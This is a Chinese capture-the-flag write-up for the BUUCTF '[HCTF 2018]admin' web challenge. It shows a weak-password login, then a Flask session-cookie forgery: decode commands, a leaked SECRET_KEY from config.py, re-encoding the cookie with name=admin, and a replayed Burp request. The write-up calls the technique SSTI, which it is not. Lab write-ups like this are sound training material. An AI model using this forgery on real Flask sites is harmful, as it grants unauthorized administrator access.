BUUCTF WEB [HCTF 2018]admin
解法1
弱口令登录
admin
123
得到flag
flag{195df147-fa34-4359-b475-94f71265d085}
解法2
F12查看网页源代码,在change页面发现一段注释
<!-- https://github.com/woadsl1234/hctf_flask/ -->
下载源代码分析,改网站由flask模板搭建,尝试SSTI模板注入。
-
查看路由信息
routes.py
@app.route('/') @app.route('/index') def index(): return render_template('index.html', title = 'hctf')
index.html
{% include('header.html') %} {% if current_user.is_authenticated %} <h1 class="nav">Hello {{ session['name'] }}</h1> {% endif %} {% if current_user.is_authenticated and session['name'] == 'admin' %} <h1 class="nav">hctf{xxxxxxxxx}</h1> {% endif %} <!-- you are not admin --> <h1 class="nav">Welcome to hctf</h1> {% include('footer.html') %}
index.html中存在一个注入点
Hello {{ session['name'] }}
-
尝试伪造session,首先使用
flask_session_cookie_manager
将现在的session解密python3 flask_session_cookie_manager3.py decode -c ".eJw9kMGKgzAURX9leGsXmnY2hS5mSCeM8BIM0ZBsSsemamw6oJZaS_99xIEu7urA4d77gP2pc30Nm6G7ugj2zRE2D3j7gQ0gyyecZC1oHSzNVkjk2YSiRrq7WVqcOS3fecjuXONovUkEzWNkuEZmYuOrldC8EXqXGLJ4vJk-JvQZ4UG2SPLRqNlFvjwn3zH3tkW9G1EdA9IsQZK2NsyMmRVn2VowG7gyhHsZhCoTy3CyAQmqNKAyW3hGUPbdaT_8tu7ymmB1URsi58r5aHXaCFbMmSsS2Qj1ebbajMjSmk-y4T6_W1ol_LZddE04VO5lKvPBuOqfXA5hBjC4foAIrr3rltsgieH5B_EYa-E.YlvM9w.qndN8qh-krjrQ-rlSxvdMc6AFNY"
得到
b'{"_fresh":true,"_id":{" b":"MGUzMzRhODhmZDQ3M2RlYmVhMDEwZDVlNDc5NmQyNWMxZjY1ODU0MGM4MGY0Yjg3OWNiOWE1Y2UzMzRjYzAzMjQ2NmRkM2UxYTVhM2FjN2I0NjZkMWExMTdmMDQ1M2JkZmFjNGY3NGQ4OGZmNTY2NjRmOTc1ZGMzZmM2MTJmMTY="},"csrf_token":{" b":"ZWVhY2RhMDUxZWJiOGViOGM4M2RiOTBlZWYxMGJhNzRiNjUyZDg1Nw=="},"image":{" b":"cUtYeg=="},"name":"test","user_id":"10"}'
然后将name的值修改为admin
b'{"_fresh":true,"_id":{" b":"MGUzMzRhODhmZDQ3M2RlYmVhMDEwZDVlNDc5NmQyNWMxZjY1ODU0MGM4MGY0Yjg3OWNiOWE1Y2UzMzRjYzAzMjQ2NmRkM2UxYTVhM2FjN2I0NjZkMWExMTdmMDQ1M2JkZmFjNGY3NGQ4OGZmNTY2NjRmOTc1ZGMzZmM2MTJmMTY="},"csrf_token":{" b":"ZWVhY2RhMDUxZWJiOGViOGM4M2RiOTBlZWYxMGJhNzRiNjUyZDg1Nw=="},"image":{" b":"cUtYeg=="},"name":"admin","user_id":"10"}'
在
config.py
中找到加密所要使用的盐import os class Config(object): SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123' SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test' SQLALCHEMY_TRACK_MODIFICATIONS = True
加密
python3 flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh':True,'_id': b'0e334a88fd473debea010d5e4796d25c1f658540c80f4b879cb9a5ce334cc032466dd3e1a5a3ac7b466d1a117f0453bdfac4f74d88ff56664f975dc3fc612f16','csrf_token': b'eeacda051ebb8eb8c83db90eef10ba74b652d857','image': b'qKXz','name':'admin','user_id':'10'}"
.eJw9kMGKwjAURX9leGsXbXQ2gosZ4oQpvISGtCHZiFNrm9TnQFWsFf99igMu7urA4d57h82-r08tLM_9pZ7BJuxgeYe3H1gCimLEUbeKt-R5PkemD47KFvn66nl5kLx6l5TfpMXBR5cqXiQocIHCJS42c2VlUHadOvb0RDd-jBhzJkl3yIrBmcnFvqJk34mMvkO7HtDsCHmeIss6TxMTbi5FvlDCkzSOyahJmSr1AkdPyNBkhMat4DGD6tTvN-ffrj6-Jnhbto7pqXIxeJsFJcopU0WmgzKfB2_dgCJr5aiDjMXN8yaV19VTF2jb1C9TVZxd3fyT45YmANsdhSPM4HKq--dvkCbw-ANc62wq.Ylvb5g.DUA8zwAHnnZJtKcOEoC84MxbRQo
-
使用burp修改session发包
GET /index HTTP/1.1 Host: 68d7742b-0d5a-43d5-b7e4-5dde4d30cca4.node4.buuoj.cn:81 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://68d7742b-0d5a-43d5-b7e4-5dde4d30cca4.node4.buuoj.cn:81/login Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: session=.eJw9kMGKwjAURX9leGsXbXQ2gosZ4oQpvISGtCHZiFNrm9TnQFWsFf99igMu7urA4d57h82-r08tLM_9pZ7BJuxgeYe3H1gCimLEUbeKt-R5PkemD47KFvn66nl5kLx6l5TfpMXBR5cqXiQocIHCJS42c2VlUHadOvb0RDd-jBhzJkl3yIrBmcnFvqJk34mMvkO7HtDsCHmeIss6TxMTbi5FvlDCkzSOyahJmSr1AkdPyNBkhMat4DGD6tTvN-ffrj6-Jnhbto7pqXIxeJsFJcopU0WmgzKfB2_dgCJr5aiDjMXN8yaV19VTF2jb1C9TVZxd3fyT45YmANsdhSPM4HKq--dvkCbw-ANc62wq.Ylvb5g.DUA8zwAHnnZJtKcOEoC84MxbRQo Connection: close
-
得到flag
flag{195df147-fa34-4359-b475-94f71265d085}